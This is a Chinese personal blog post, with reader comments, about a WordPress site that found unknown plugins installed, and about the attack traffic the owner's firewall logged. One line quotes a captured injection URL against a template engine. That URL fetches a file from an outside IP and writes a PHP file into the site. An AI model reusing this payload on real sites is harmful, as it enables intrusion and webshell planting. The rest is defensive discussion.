事发
2月5日晚上10:05,我在做项目的时候需要扒一个favicon,便想着去自己的wp后台顺一个圆形的logo。可当我如往常一样登录之后,我发现自己的WP后台侧栏多了一个选项——“WP文件管理器”。
而我,从来没有安装过这个插件。
我慌了,赶紧点进“插件”页面,发现我的WP在不知情的情况下被装了两个新插件:
如果这两个插件真是我亲手安装的,那为什么我会一点印象都没有,甚至连插件是干什么的都不知道呢?
如果不是我安装的,那会是谁安装的呢?是通过什么技术手段安装的呢?
排查
事发之后,我火速排查了自己的宝塔WAF,发现这几天的攻击十分频繁,有的攻击还十分离谱——比如:
/?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=ceshi.php&t2=file_get_contents&t3=http://110.40.132.172:800/1.TXT这个大概意思应该是往我的网站目录里写入一个php文件,使其可以被访问。还好,“http://110.40.132.172:800/1.TXT”这个文件的PHP代码只是“test”,否则可能就没有现在的这篇文章了。
针对WP的攻击很多,无差别扫站攻击,我typecho每天还有一堆ip扫我wp-admin目录。不管,被打直接开cf,打服务器就直接关机似给你看,打不死的。
提醒一下:301到gov.cn,被起诉的是你。
😂是我无知了,谢谢提醒
我现在是看见那些攻击我站的就拉黑IP段。(ps:每天一大堆美国、新加坡、香港IP来攻击🥵)
早10年我就不用WP,安全是个大问题。
我静态博客也被攻击到 Vercel 免费用量爆满两次,现在 Vercel 账号直接被停了,直接换成 Cloudflare Pages,看谁打得动。
用 Typecho 的时候也遇到过很多访问我 /wp-admin/ 目录的流量。这些大概是无差别攻击,前面的是有针对性的。
无差别的就没办法了,只能自己做好安全措施,最简单的方法当然是上 Cloudflare,质询所有海外流量,必须通过人机验证否则 403。不用 Cloudflare 的话应该也可以在服务器上装防火墙或者其他的安全软件,不过我没用过就不清楚了。如果有 CDN 的话要尤为注意,之前有个肮脏的骇客给我留下了 140 块的账单,一般 CDN 都有 DDoS 防护,要自己打开,设置每分钟最高请求阈值。
我之前还觉得不惹人就可以了(虽然有一两次被打的确是因为口嗨hhhh),但防不过有些人无聊,所以自己的安全措施够硬才是最有用的。
原来静态博客也会被攻击啊,只不过攻击方式不一样……
我现在真有点怕了😅昨天刚听我一朋友说他用cn域名被开了,今天又发现静态博客也可能被攻击。
那些无差别攻击的人真的很没意思。。我的宝塔已经开了国外IP人机验证了,看看最近会不会改变。
最后,感谢来访~
😔个人站的抵抗力普遍较弱,保财保数据计较重要。
没错,我现在除了平时在服务器本地备份外,还设定了每周一自动上传备份到腾讯云cos,大厂可信。
谢谢来访!🤗
无差别攻击,我这边也是,天天都在扫,习惯了。
不知道Fail2Bban这个工具能不能拦截的掉。☹️
已经开了宝塔云WAF,不管他们了。
反正他们也不打服务器,挺好,打了我就开CF代理(😥